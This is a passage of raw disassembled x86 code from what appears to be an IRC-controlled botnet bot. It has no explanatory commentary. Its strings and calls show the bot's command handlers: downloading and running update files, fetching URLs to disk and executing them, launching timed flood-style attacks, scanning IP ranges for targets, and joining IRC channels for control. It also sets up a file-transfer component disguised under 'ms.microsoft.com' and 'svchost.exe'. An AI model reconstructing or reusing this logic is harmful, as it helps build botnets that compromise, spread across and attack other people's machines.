mov eax, [eax]
push dword ptr [eax]
call dword_419254 ; inet_ntoa
push eax
loc_4038DD: ; CODE XREF: sub_40198E+1F34�j
push edi
lea eax, [ebp+var_814]
push offset aSS_1 ; "%s -> %s"
push eax
call sub_40D6BB
push [ebp+var_4]
lea eax, [ebp+var_814]
push eax
push [ebp+var_B0]
push [ebp+arg_4]
call sub_4017B6
add esp, 20h
jmp loc_402660
; ---------------------------------------------------------------------------
loc_40390F: ; CODE XREF: sub_40198E+1F30�j
; sub_40198E+1F3F�j
push [ebp+var_4]
push offset aCouldNotResolv ; "could not resolve host"
jmp loc_403865
; ---------------------------------------------------------------------------
loc_40391C: ; CODE XREF: sub_40198E+1F0F�j
push esi
push offset aMircmd ; "mIRCMD"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_40399F
cmp [ebp+var_14], ebx
jz loc_402660
push edi
push [ebp+var_14]
call sub_40D810
cmp eax, ebx
pop ecx
pop ecx
jz loc_402660
push eax
call sub_408995
test eax, eax
pop ecx
lea eax, [ebp+var_814]
jnz short loc_403961
push offset aClientNotOpen_ ; "Client not open."
jmp short loc_403966
; ---------------------------------------------------------------------------
loc_403961: ; CODE XREF: sub_40198E+1FCA�j
push offset dword_4196F8
loc_403966: ; CODE XREF: sub_40198E+1FD1�j
; sub_40198E+2449�j
push eax
call sub_40D6BB
pop ecx
pop ecx
loc_40396E: ; CODE XREF: sub_40198E+2424�j
; sub_40198E+2439�j
cmp [ebp+var_10], ebx
jnz short loc_40398E
push [ebp+var_4]
lea eax, [ebp+var_814]
push eax
push [ebp+var_B0]
push [ebp+arg_4]
call sub_4017B6
add esp, 10h
loc_40398E: ; CODE XREF: sub_40198E+1FE3�j
lea eax, [ebp+var_814]
push eax
call sub_401648
jmp loc_40273E
; ---------------------------------------------------------------------------
loc_40399F: ; CODE XREF: sub_40198E+1F9D�j
mov eax, [ebp+var_1C]
mov esi, [ebp+eax+var_B0]
cmp esi, ebx
jz loc_401C32
push [ebp+var_8]
push offset aPm ; "pm"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_403A00
cmp [ebp+var_14], ebx
jz loc_402660
push edi
call sub_40D630
push [ebp+var_8]
mov edi, eax
call sub_40D630
add eax, [ebp+var_14]
push esi
lea eax, [eax+edi+2]
push eax
call sub_40D810
add esp, 10h
cmp eax, ebx
jz loc_402660
push ebx
push eax
push [ebp+var_C]
jmp loc_40386B
; ---------------------------------------------------------------------------
loc_403A00: ; CODE XREF: sub_40198E+2034�j
push [ebp+var_8]
push offset aAct ; "act"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_403A6F
cmp [ebp+var_14], ebx
jz loc_402660
push edi
call sub_40D630
push [ebp+var_8]
mov edi, eax
call sub_40D630
add eax, [ebp+var_14]
push esi
lea eax, [eax+edi+2]
push eax
call sub_40D810
add esp, 10h
cmp eax, ebx
jz loc_402660
push eax
lea eax, [ebp+var_814]
push offset dword_4196EC
push eax
call sub_40D6BB
push ebx
lea eax, [ebp+var_814]
push eax
push [ebp+var_C]
loc_403A62: ; CODE XREF: sub_40198E+2816�j
push [ebp+arg_4]
call sub_4017B6
jmp loc_40265D
; ---------------------------------------------------------------------------
loc_403A6F: ; CODE XREF: sub_40198E+2083�j
push [ebp+var_8]
push offset aCyc ; "cyc"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_403ADD
push [ebp+var_B4]
push offset a332 ; "332"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jz loc_401C32
push esi
push offset aPartS ; "PART %s\r\n"
push [ebp+arg_4]
call sub_40170D
push edi
call sub_40E0C8
imul eax, 3E8h
add esp, 10h
push eax
call dword_419060 ; Sleep
mov eax, [ebp+var_1C]
push [ebp+eax+var_AC]
push esi
loc_403ACB: ; CODE XREF: sub_40198E+1D85�j
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_401760
jmp loc_403873
; ---------------------------------------------------------------------------
loc_403ADD: ; CODE XREF: sub_40198E+20F2�j
push [ebp+var_8]
push offset aMode ; "mode"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz short loc_403B17
cmp [ebp+var_14], ebx
jz loc_402660
push edi
push [ebp+var_14]
call sub_40D810
cmp eax, ebx
pop ecx
pop ecx
jz loc_402660
push eax
push offset aModeS ; "MODE %s\r\n"
jmp loc_4036E8
; ---------------------------------------------------------------------------
loc_403B17: ; CODE XREF: sub_40198E+2160�j
push [ebp+var_8]
push offset aRepeat ; "repeat"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz loc_403BB2
push [ebp+var_B4]
push offset a332 ; "332"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jz loc_401C32
cmp [ebp+var_14], ebx
jz loc_402660
push esi
push [ebp+var_14]
call sub_40D810
push eax
push [ebp+var_B0]
lea eax, [ebp+var_814]
push [ebp+var_B4]
push [ebp+var_B8]
push offset aSSSS_0 ; "%s %s %s :%s"
push eax
call sub_40D6BB
push 1FFh
lea eax, [ebp+var_814]
push eax
push [ebp+arg_0]
call sub_40DB80
push edi
call sub_40E0C8
add esp, 30h
test eax, eax
jle loc_402660
push edi
call sub_40E0C8
add eax, [ebp+arg_24]
pop ecx
jmp loc_401C35
; ---------------------------------------------------------------------------
loc_403BB2: ; CODE XREF: sub_40198E+219A�j
push [ebp+var_8]
push offset aDelay ; "delay"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz loc_403C57
push [ebp+var_B4]
push offset a332 ; "332"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jz loc_401C32
cmp [ebp+var_14], ebx
jz loc_402660
push esi
push [ebp+var_14]
call sub_40D810
push eax
push [ebp+var_B0]
lea eax, [ebp+var_814]
push [ebp+var_B4]
push [ebp+var_B8]
push offset aSSSS_0 ; "%s %s %s :%s"
push eax
call sub_40D6BB
push 1FFh
lea eax, [ebp+var_814]
push eax
push [ebp+arg_0]
call sub_40DB80
push edi
call sub_40E0C8
add esp, 30h
test eax, eax
jle short loc_403C4E
push edi
call sub_40E0C8
imul eax, 3E8h
pop ecx
push eax
call dword_419060 ; Sleep
loc_403C4E: ; CODE XREF: sub_40198E+22AA�j
mov eax, [ebp+arg_24]
inc eax
jmp loc_401C35
; ---------------------------------------------------------------------------
loc_403C57: ; CODE XREF: sub_40198E+2235�j
push [ebp+var_8]
push offset aAu ; "au"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz loc_403DDC
push esi
push offset aBawha ; "bawha"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jz loc_403DCC
lea eax, [ebp+var_1F4]
push eax
push 104h
call dword_4190A0 ; GetTempPathA
push 0FFh
lea eax, [ebp+var_A34]
push edi
push eax
call sub_40DB80
lea eax, [ebp+var_D4]
push eax
call sub_409C44
push eax
lea eax, [ebp+var_1F4]
push eax
lea eax, [ebp+var_934]
push offset aSS_exe ; "%s%s.exe"
push eax
call sub_40D6BB
mov eax, [ebp+var_1C]
mov eax, [ebp+eax+var_A8]
add esp, 20h
cmp eax, ebx
mov [ebp+var_830], 1
mov [ebp+var_82C], ebx
jz short loc_403CFC
push eax
call sub_40E0C8
pop ecx
mov [ebp+var_828], eax
jmp short loc_403D02
; ---------------------------------------------------------------------------
loc_403CFC: ; CODE XREF: sub_40198E+235D�j
mov [ebp+var_828], ebx
loc_403D02: ; CODE XREF: sub_40198E+236C�j
movzx eax, [ebp+var_3AF]
mov esi, [ebp+arg_4]
push 7Fh
push [ebp+var_B0]
mov [ebp+var_824], eax
lea eax, [ebp+var_AB4]
push eax
mov [ebp+var_AB8], esi
call sub_40DB80
mov eax, [ebp+var_4]
mov [ebp+var_81C], eax
mov eax, [ebp+var_10]
push edi
mov [ebp+var_820], eax
lea eax, [ebp+var_814]
push offset aGettingUpdateF ; "Getting Update From: %s."
push eax
call sub_40D6BB
push esi
lea eax, [ebp+var_814]
push 6
push eax
call sub_40A83B
add esp, 24h
mov [ebp+var_834], eax
lea eax, [ebp+var_24]
push eax
push ebx
lea eax, [ebp+var_AB8]
push eax
push offset sub_4056A2
push ebx
push ebx
call dword_4190B0 ; CreateThread
mov ecx, [ebp+var_834]
imul ecx, 434h
cmp eax, ebx
mov dword_42221C[ecx], eax
jnz short loc_403DBF
call dword_4190AC ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_814]
push offset aFailedToStartD ; "Failed to start download thread, error:"...
push eax
call sub_40D6BB
add esp, 0Ch
jmp loc_40396E
; ---------------------------------------------------------------------------
loc_403DB7: ; CODE XREF: sub_40198E+2437�j
push 32h
call dword_419060 ; Sleep
loc_403DBF: ; CODE XREF: sub_40198E+2407�j
cmp [ebp+var_818], ebx
jz short loc_403DB7
jmp loc_40396E
; ---------------------------------------------------------------------------
loc_403DCC: ; CODE XREF: sub_40198E+22EF�j
push offset aShitMustBeDiff ; "SHit must be different than current run"...
lea eax, [ebp+var_814]
jmp loc_403966
; ---------------------------------------------------------------------------
loc_403DDC: ; CODE XREF: sub_40198E+22DA�j
push [ebp+var_8]
push offset aExe ; "exe"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz loc_403E7B
push 44h
lea eax, [ebp+var_134]
push ebx
push eax
call sub_40D7B0
push edi
mov [ebp+var_134], 44h
call sub_40E0C8
add esp, 10h
neg eax
sbb eax, eax
and eax, 5
cmp [ebp+var_14], ebx
mov word ptr [ebp+var_104], ax
jz loc_402660
push esi
push [ebp+var_14]
call sub_40D810
cmp eax, ebx
pop ecx
pop ecx
jz loc_402660
lea ecx, [ebp+var_C8]
push ecx
lea ecx, [ebp+var_134]
push ecx
push ebx
push ebx
push 28h
push 1
push ebx
push ebx
push eax
push ebx
call dword_41909C ; CreateProcessA
test eax, eax
jnz loc_402660
cmp [ebp+var_10], ebx
jnz loc_402660
push [ebp+var_4]
push offset aCouldnTExecute ; "couldn't execute file."
jmp loc_403865
; ---------------------------------------------------------------------------
loc_403E7B: ; CODE XREF: sub_40198E+245F�j
mov eax, [ebp+var_1C]
mov eax, [ebp+eax+var_AC]
cmp eax, ebx
mov [ebp+arg_0], eax
jz loc_401C32
push [ebp+var_8]
push offset aDu ; "du"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz loc_403FEF
mov edi, 0FFh
push edi
push [ebp+var_C]
lea eax, [ebp+var_A34]
push eax
call sub_40DB80
push edi
lea eax, [ebp+var_934]
push esi
push eax
call sub_40DB80
mov eax, [ebp+var_1C]
push [ebp+eax+var_AC]
mov [ebp+var_830], ebx
call sub_40E0C8
mov [ebp+var_82C], eax
mov eax, [ebp+var_1C]
mov eax, [ebp+eax+var_A4]
add esp, 1Ch
cmp eax, ebx
jz short loc_403F05
push eax
call sub_40E0C8
pop ecx
mov [ebp+var_828], eax
jmp short loc_403F0B
; ---------------------------------------------------------------------------
loc_403F05: ; CODE XREF: sub_40198E+2566�j
mov [ebp+var_828], ebx
loc_403F0B: ; CODE XREF: sub_40198E+2575�j
movzx eax, [ebp+var_3AF]
mov edi, [ebp+arg_4]
push 7Fh
push [ebp+var_B0]
mov [ebp+var_824], eax
lea eax, [ebp+var_AB4]
push eax
mov [ebp+var_AB8], edi
call sub_40DB80
mov eax, [ebp+var_4]
push esi
push [ebp+var_C]
mov [ebp+var_81C], eax
mov eax, [ebp+var_10]
mov [ebp+var_820], eax
lea eax, [ebp+var_814]
push offset aGettingUrlSToS ; "Getting URL: %s to: %s."
push eax
call sub_40D6BB
push edi
lea eax, [ebp+var_814]
push 5
push eax
call sub_40A83B
add esp, 28h
mov [ebp+var_834], eax
lea eax, [ebp+var_24]
push eax
push ebx
lea eax, [ebp+var_AB8]
push eax
push offset sub_4056A2
push ebx
push ebx
call dword_4190B0 ; CreateThread
mov ecx, [ebp+var_834]
imul ecx, 434h
cmp eax, ebx
mov dword_42221C[ecx], eax
jnz short loc_403FE5
call dword_4190AC ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_814]
push offset aFailedToStartT ; "Failed to start transfer, error: <%d>."
push eax
call sub_40D6BB
add esp, 0Ch
loc_403FBE: ; CODE XREF: sub_40198E+265F�j
cmp [ebp+var_10], ebx
jnz loc_4046CF
push [ebp+var_4]
lea eax, [ebp+var_814]
push eax
push [ebp+var_B0]
push edi
jmp loc_4046C7
; ---------------------------------------------------------------------------
loc_403FDD: ; CODE XREF: sub_40198E+265D�j
push 32h
call dword_419060 ; Sleep
loc_403FE5: ; CODE XREF: sub_40198E+2613�j
cmp [ebp+var_818], ebx
jz short loc_403FDD
jmp short loc_403FBE
; ---------------------------------------------------------------------------
loc_403FEF: ; CODE XREF: sub_40198E+2513�j
push [ebp+var_8]
push offset aSkybye ; "skybye"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz loc_4040EA
push 7Fh
lea eax, [ebp+var_300]
push edi
push eax
loc_404010: ; DATA XREF: .text:0041E990�o
call sub_40DB80
push 7Fh
lea eax, [ebp+var_280]
push esi
push eax
call sub_40DB80
push 7Fh
push [ebp+arg_0]
lea eax, [ebp+var_200]
push eax
call sub_40DB80
push 7Fh
push [ebp+var_B0]
lea eax, [ebp+var_180]
push eax
call sub_40DB80
mov eax, [ebp+var_4]
push [ebp+arg_0]
mov [ebp+var_FC], eax
mov eax, [ebp+var_10]
mov [ebp+var_F8], eax
mov eax, [ebp+arg_4]
push esi
push edi
mov [ebp+var_304], eax
lea eax, [ebp+var_814]
push offset aStartingSSForS ; "Starting: (%s:%s) for %s seconds."
push eax
call sub_40D6BB
add esp, 44h
push ebx
lea eax, [ebp+var_814]
push 4
push eax
call sub_40A83B
add esp, 0Ch
mov [ebp+var_100], eax
lea eax, [ebp+var_24]
push eax
push ebx
lea eax, [ebp+var_304]
push eax
push offset sub_409FE8
push ebx
push ebx
call dword_4190B0 ; CreateThread
mov ecx, [ebp+var_100]
imul ecx, 434h
cmp eax, ebx
mov dword_42221C[ecx], eax
jnz short loc_4040DD
call dword_4190AC ; RtlGetLastWin32Error
push eax
push offset aFailedToStar_2 ; "Failed to start: <%d>."
jmp loc_4046A0
; ---------------------------------------------------------------------------
loc_4040D5: ; CODE XREF: sub_40198E+2755�j
push 32h
call dword_419060 ; Sleep
loc_4040DD: ; CODE XREF: sub_40198E+2734�j
cmp [ebp+var_F4], ebx
jz short loc_4040D5
jmp loc_4046AF
; ---------------------------------------------------------------------------
loc_4040EA: ; CODE XREF: sub_40198E+2672�j
mov eax, [ebp+var_1C]
mov eax, [ebp+eax+var_A8]
cmp eax, ebx
mov [ebp+var_18], eax
jz loc_401C32
push [ebp+var_8]
push offset aFind_0 ; "find"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz loc_4046F3
push [ebp+arg_4]
call sub_408CE6
push eax
call sub_408D3F
test al, al
pop ecx
pop ecx
jz short loc_404164
push [ebp+var_B0]
mov edi, offset dword_41E194
push edi
call dword_4190A4 ; lstrcmpi
test eax, eax
jz short loc_404161
cmp [ebp+var_3A0], bl
jz short loc_404161
loc_404148: ; CODE XREF: sub_40198E+192C�j
push [ebp+arg_C]
push edi
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_407C1D
loc_404159: ; CODE XREF: sub_40198E+1E1�j
; sub_40198E+14C5�j ...
add esp, 10h
jmp loc_401C32
; ---------------------------------------------------------------------------
loc_404161: ; CODE XREF: sub_40198E+27B0�j
; sub_40198E+27B8�j
mov edi, [ebp+var_C]
loc_404164: ; CODE XREF: sub_40198E+279A�j
push 3
call sub_40AA32
push esi
mov [ebp+arg_0], eax
call sub_40E0C8
add eax, [ebp+arg_0]
pop ecx
cmp eax, 0A0h
pop ecx
jle short loc_4041A9
push [ebp+arg_0]
lea eax, [ebp+var_814]
push offset aDTooManyShit_ ; "%d Too Many Shit."
push eax
call sub_40D6BB
push [ebp+var_4]
lea eax, [ebp+var_814]
push eax
push [ebp+var_B0]
jmp loc_403A62
; ---------------------------------------------------------------------------
loc_4041A9: ; CODE XREF: sub_40198E+27F0�j
push edi
call sub_40E0C8
push esi
mov [ebp+var_128], eax
call sub_40E0C8
mov [ebp+var_110], eax
mov eax, [ebp+var_1C]
push [ebp+eax+var_AC]
call sub_40E0C8
add esp, 0Ch
cmp eax, 5
mov [ebp+var_124], eax
jnb short loc_4041E7
push 5
pop eax
mov [ebp+var_124], eax
loc_4041E7: ; CODE XREF: sub_40198E+284E�j
push 3Ch
pop ecx
cmp eax, ecx
jbe short loc_4041F4
mov [ebp+var_124], ecx
loc_4041F4: ; CODE XREF: sub_40198E+285E�j
mov eax, [ebp+var_1C]
push [ebp+eax+var_A8]
call sub_40E0C8
mov [ebp+var_120], eax
mov eax, 270Fh
cmp [ebp+var_120], eax
pop ecx
jbe short loc_40421D
mov [ebp+var_120], eax
loc_40421D: ; CODE XREF: sub_40198E+2887�j
or esi, 0FFFFFFFFh
cmp dword_41EE78, ebx
mov [ebp+var_10C], esi
mov [ebp+arg_0], ebx
jz short loc_40426F
mov esi, offset dword_41EE78
loc_404236: ; CODE XREF: sub_40198E+28C0�j
lea eax, [esi-28h]
push edi
push eax
call sub_40D720
test eax, eax
pop ecx
pop ecx
jz short loc_404252
inc [ebp+arg_0]
add esi, 3Ch
cmp [esi], ebx
jnz short loc_404236
jmp short loc_40426C
; ---------------------------------------------------------------------------
loc_404252: ; CODE XREF: sub_40198E+28B6�j
mov eax, [ebp+arg_0]
mov ecx, eax
imul ecx, 3Ch
mov ecx, dword_41EE78[ecx]
mov [ebp+var_128], ecx
mov [ebp+var_10C], eax
loc_40426C: ; CODE XREF: sub_40198E+28C2�j
or esi, 0FFFFFFFFh
loc_40426F: ; CODE XREF: sub_40198E+28A1�j
cmp [ebp+var_128], ebx
jnz short loc_404281
push offset aP0rtIsInvalid_ ; "p0rt is invalid."
jmp loc_4043EA
; ---------------------------------------------------------------------------
loc_404281: ; CODE XREF: sub_40198E+28E7�j
mov eax, [ebp+var_1C]
mov edi, [ebp+eax+var_A4]
cmp edi, ebx
mov [ebp+var_28], edi
jz loc_4043BD
cmp byte ptr [edi], 23h
jz loc_4043BD
push edi
lea eax, [ebp+var_23C]
push 10h
push eax
call sub_40DFEC
push 78h
push edi
call sub_40E120
add esp, 14h
neg eax
sbb eax, eax
neg eax
cmp [ebp+var_39B], bl
mov [ebp+var_FC], eax
jnz short loc_4042D9
cmp [ebp+var_39D], bl
jz loc_404588
loc_4042D9: ; CODE XREF: sub_40198E+293D�j
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_23C]
push offset dword_419868
push eax
mov [ebp+var_18], esi
mov [ebp+var_14], esi
mov [ebp+var_C], esi
mov [ebp+var_20], esi
call sub_40DCA4
add esp, 18h
cmp [ebp+var_14], esi
jnz short loc_40432D
call sub_40E04D
mov [ebp+arg_0], eax
fild [ebp+arg_0]
fmul dbl_419860
fmul dbl_419858
call sub_40E2E4
mov [ebp+var_14], eax
loc_40432D: ; CODE XREF: sub_40198E+297E�j
cmp [ebp+var_C], esi
jnz short loc_404335
mov [ebp+var_C], ebx
loc_404335: ; CODE XREF: sub_40198E+29A2�j
mov eax, [ebp+var_20]
cmp eax, esi
jnz short loc_404341
xor eax, eax
mov [ebp+var_20], eax
loc_404341: ; CODE XREF: sub_40198E+29AC�j
shl eax, 8
add eax, [ebp+var_C]
shl eax, 8
add eax, [ebp+var_14]
shl eax, 8
add eax, [ebp+var_18]
push eax
call dword_4C4710
push eax
lea eax, [ebp+var_23C]
push offset aS_0 ; "%s"
push eax
call sub_40D6BB
add esp, 0Ch
cmp [ebp+var_39D], bl
mov [ebp+var_FC], ebx
jz loc_404588
lea eax, [ebp+var_23C]
push 30h
push eax
call sub_40DCE0
pop ecx
pop ecx
mov byte ptr [ebp+arg_0+3], bl
loc_404394: ; CODE XREF: sub_40198E+2A28�j
cmp eax, ebx
jz loc_40457E
mov byte ptr [eax], 78h
lea eax, [ebp+var_23C]
push 30h
push eax
call sub_40DCE0
inc byte ptr [ebp+arg_0+3]
cmp byte ptr [ebp+arg_0+3], 2
pop ecx
pop ecx
jl short loc_404394
jmp loc_40457E
; ---------------------------------------------------------------------------
loc_4043BD: ; CODE XREF: sub_40198E+2902�j
; sub_40198E+290B�j
cmp [ebp+var_3B3], bl
jnz short loc_4043FD
cmp [ebp+var_3B2], bl
jnz short loc_4043FD
cmp [ebp+var_3A2], bl
jnz short loc_4043FD
cmp [ebp+var_39B], bl
jnz short loc_4043FD
cmp [ebp+var_39D], bl
jnz short loc_4043FD
loc_4043E5: ; CODE XREF: sub_40198E+1A41�j
push offset aNoIp_ ; "no IP."
loc_4043EA: ; CODE XREF: sub_40198E+1D3C�j
; sub_40198E+1E21�j ...
lea eax, [ebp+var_814]
push eax
call sub_40D6BB
pop ecx
pop ecx
jmp loc_4046AF
; ---------------------------------------------------------------------------
loc_4043FD: ; CODE XREF: sub_40198E+2A35�j
; sub_40198E+2A3D�j ...
push 10h
pop edi
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_C8]
push eax
push [ebp+arg_4]
mov [ebp+var_8], edi
call dword_4C45F8
mov al, [ebp+var_3B3]
neg al
push edi
sbb eax, eax
and eax, 0FFFF0100h
add eax, 0FFFFh
and [ebp+var_C4], eax
push [ebp+var_C4]
call dword_4C4710
push eax
lea eax, [ebp+var_23C]
push eax
call sub_40DB80
add esp, 0Ch
cmp [ebp+var_3A2], bl
jz short loc_4044AB
xor eax, eax
cmp [ebp+var_3B3], bl
push 30h
setnz al
inc eax
inc eax
mov edi, eax
lea eax, [ebp+var_23C]
push eax
call sub_40DCE0
cmp edi, ebx
pop ecx
pop ecx
mov byte ptr [ebp+arg_0+3], bl
jle loc_40457E
loc_404480: ; CODE XREF: sub_40198E+2B16�j
cmp eax, ebx
jz loc_40457E
mov byte ptr [eax], 78h
lea eax, [ebp+var_23C]
push 30h
push eax
call sub_40DCE0
inc byte ptr [ebp+arg_0+3]
pop ecx
pop ecx
movsx ecx, byte ptr [ebp+arg_0+3]
cmp ecx, edi
jl short loc_404480
jmp loc_40457E
; ---------------------------------------------------------------------------
loc_4044AB: ; CODE XREF: sub_40198E+2AC6�j
cmp [ebp+var_39B], bl
jnz short loc_4044C6
cmp [ebp+var_39D], bl
jnz short loc_4044C6
mov [ebp+var_FC], ebx
jmp loc_404588
; ---------------------------------------------------------------------------
loc_4044C6: ; CODE XREF: sub_40198E+2B23�j
; sub_40198E+2B2B�j
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_20]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_23C]
push offset dword_419868
push eax
mov [ebp+var_14], esi
mov [ebp+var_18], esi
mov [ebp+var_20], esi
mov [ebp+var_C], esi
call sub_40DCA4
add esp, 18h
call sub_40E04D
mov [ebp+arg_0], eax
fild [ebp+arg_0]
fmul dbl_419860
fmul dbl_419858
call sub_40E2E4
mov [ebp+var_18], eax
shl eax, 8
add eax, [ebp+var_14]
mov [ebp+var_20], ebx
push eax
mov [ebp+var_C], ebx
call dword_4C4710
push eax
lea eax, [ebp+var_23C]
push offset aS_0 ; "%s"
push eax
call sub_40D6BB
add esp, 0Ch
cmp [ebp+var_39D], bl
mov [ebp+var_FC], ebx
jz short loc_404588
lea eax, [ebp+var_23C]
push 30h
push eax
call sub_40DCE0
pop ecx
pop ecx
mov byte ptr [ebp+arg_0+3], bl
loc_40455E: ; CODE XREF: sub_40198E+2BEE�j
cmp eax, ebx
jz short loc_40457E
mov byte ptr [eax], 78h
lea eax, [ebp+var_23C]
push 30h
push eax
call sub_40DCE0
inc byte ptr [ebp+arg_0+3]
cmp byte ptr [ebp+arg_0+3], 2
pop ecx
pop ecx
jl short loc_40455E
loc_40457E: ; CODE XREF: sub_40198E+2A08�j
; sub_40198E+2A2A�j ...
mov [ebp+var_FC], 1
loc_404588: ; CODE XREF: sub_40198E+2945�j
; sub_40198E+29ED�j ...
mov eax, [ebp+arg_4]
push [ebp+var_B0]
mov [ebp+var_12C], eax
mov eax, [ebp+var_4]
mov [ebp+var_104], eax
mov eax, [ebp+var_10]
mov [ebp+var_100], eax
mov edi, 80h
lea eax, [ebp+var_22C]
push edi
push eax
call sub_40DFEC
mov eax, [ebp+var_1C]
mov eax, [ebp+eax+var_A0]
add esp, 0Ch
cmp eax, ebx
jz short loc_4045DF
loc_4045CC: ; CODE XREF: sub_40198E+2C5B�j
push eax
loc_4045CD: ; CODE XREF: sub_40198E+2C74�j
lea eax, [ebp+var_1AC]
push edi
push eax
call sub_40DFEC
add esp, 0Ch
jmp short loc_40460A
; ---------------------------------------------------------------------------
loc_4045DF: ; CODE XREF: sub_40198E+2C3C�j
mov eax, [ebp+var_28]
cmp eax, ebx
jz short loc_4045EB
cmp byte ptr [eax], 23h
jz short loc_4045CC
loc_4045EB: ; CODE XREF: sub_40198E+2C56�j
push offset word_41994E
mov esi, offset dword_41E18C
push esi
call sub_40D720
test eax, eax
pop ecx
pop ecx
jz short loc_404604
push esi
jmp short loc_4045CD
; ---------------------------------------------------------------------------
loc_404604: ; CODE XREF: sub_40198E+2C71�j
mov [ebp+var_1AC], bl
loc_40460A: ; CODE XREF: sub_40198E+2C4F�j
cmp [ebp+var_FC], ebx
mov eax, offset aRandom ; "Random"
jnz short loc_40461C
mov eax, offset aSequential ; "Sequential"
loc_40461C: ; CODE XREF: sub_40198E+2C87�j
push [ebp+var_110]
lea ecx, [ebp+var_23C]
push [ebp+var_120]
push [ebp+var_124]
push [ebp+var_128]
push ecx
push eax
lea eax, [ebp+var_814]
push offset aSScann3rOnSDDS ; "%s Scann3r on %s:%d %d secs %d mins %d "...
push eax
call sub_40D6BB
push ebx
lea eax, [ebp+var_814]
push 3
push eax
call sub_40A83B
add esp, 2Ch
mov [ebp+var_11C], eax
lea eax, [ebp+var_24]
push eax
push ebx
lea eax, [ebp+var_23C]
push eax
push offset sub_40AFA2
push ebx
push ebx
call dword_4190B0 ; CreateThread
mov ecx, [ebp+var_11C]
imul ecx, 434h
cmp eax, ebx
mov dword_42221C[ecx], eax
jnz short loc_4046E9
call dword_4190AC ; RtlGetLastWin32Error
push eax
push offset aFailedErrorD_ ; "Failed, error: <%d>."
loc_4046A0: ; CODE XREF: sub_40198E+1E17�j
; sub_40198E+2742�j
lea eax, [ebp+var_814]
push eax
call sub_40D6BB
add esp, 0Ch
loc_4046AF: ; CODE XREF: sub_40198E+2757�j
; sub_40198E+2A6A�j ...
cmp [ebp+var_10], ebx
jnz short loc_4046CF
push [ebp+var_4]
lea eax, [ebp+var_814]
push eax
push [ebp+var_B0]
push [ebp+arg_4]
loc_4046C7: ; CODE XREF: sub_40198E+264A�j
call sub_4017B6
add esp, 10h
loc_4046CF: ; CODE XREF: sub_40198E+1666�j
; sub_40198E+167B�j ...
lea eax, [ebp+var_814]
push eax
call sub_401648
pop ecx
jmp loc_401C32
; ---------------------------------------------------------------------------
loc_4046E1: ; CODE XREF: sub_40198E+2D61�j
push 32h
call dword_419060 ; Sleep
loc_4046E9: ; CODE XREF: sub_40198E+2D04�j
cmp [ebp+var_F8], ebx
jz short loc_4046E1
jmp short loc_4046AF
; ---------------------------------------------------------------------------
loc_4046F3: ; CODE XREF: sub_40198E+2782�j
mov eax, [ebp+var_1C]
mov eax, [ebp+eax+var_A4]
cmp eax, ebx
mov [ebp+var_28], eax
jz loc_401C32
push [ebp+var_8]
push offset aSftp ; "sftp"
call sub_40D720
test eax, eax
pop ecx
pop ecx
jnz loc_402660
push edi
push 20h
pop edi
push edi
push offset aMs_microsoft_c ; "ms.microsoft.com"
call sub_40DFEC
push esi
call sub_40E0C8
push [ebp+arg_0]
mov dword_41E264, eax
push edi
push offset aMircosoft ; "mircosoft"
call sub_40DFEC
push [ebp+var_18]
push edi
push offset aPassword ; "password"
call sub_40DFEC
push [ebp+var_28]
push edi
push offset aSvchost_exe ; "svchost.exe"
call sub_40DFEC
add esp, 34h
jmp loc_401C32
; ---------------------------------------------------------------------------
loc_40476B: ; CODE XREF: sub_40198E+23E�j
; sub_40198E+253�j
push [ebp+arg_C]
push [ebp+arg_8]
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_401760
push [ebp+arg_10]
push offset aUserhostS ; "USERHOST %s\r\n"
push [ebp+arg_4]
call sub_40170D
xor eax, eax
add esp, 1Ch
inc eax
mov dword_4BD8F0, eax
jmp loc_401C35
sub_40198E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=58h
sub_40479E proc near ; CODE XREF: sub_404901+251�p
var_22C0 = byte ptr -22C0h
var_12C0 = byte ptr -12C0h
var_2C0 = byte ptr -2C0h
var_140 = byte ptr -140h
var_A0 = byte ptr -0A0h
var_20 = byte ptr -20h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_18 = dword ptr 20h
push ebp
mov eax, 22C0h
lea ebp, [esp-58h]
call sub_40D9A0
push ebx
xor ebx, ebx
push 3
mov [ebp+58h+var_8], ebx
lea eax, [ebp+58h+var_2C0]
pop ecx
loc_4047BC: ; CODE XREF: sub_40479E+26�j
mov [eax], bl
add eax, 80h
dec ecx
jnz short loc_4047BC
cmp byte_41E2F0, bl
jz short loc_4047E3
push offset byte_41E2F0
push offset aPassS ; "PASS %s\r\n"
push [ebp+58h+arg_0]
call sub_407C1D
add esp, 0Ch
loc_4047E3: ; CODE XREF: sub_40479E+2E�j
push [ebp+58h+arg_C]
lea eax, [ebp+58h+var_20]
push ebx
push ebx
push ebx
push eax
call sub_409C91
add esp, 10h
push eax
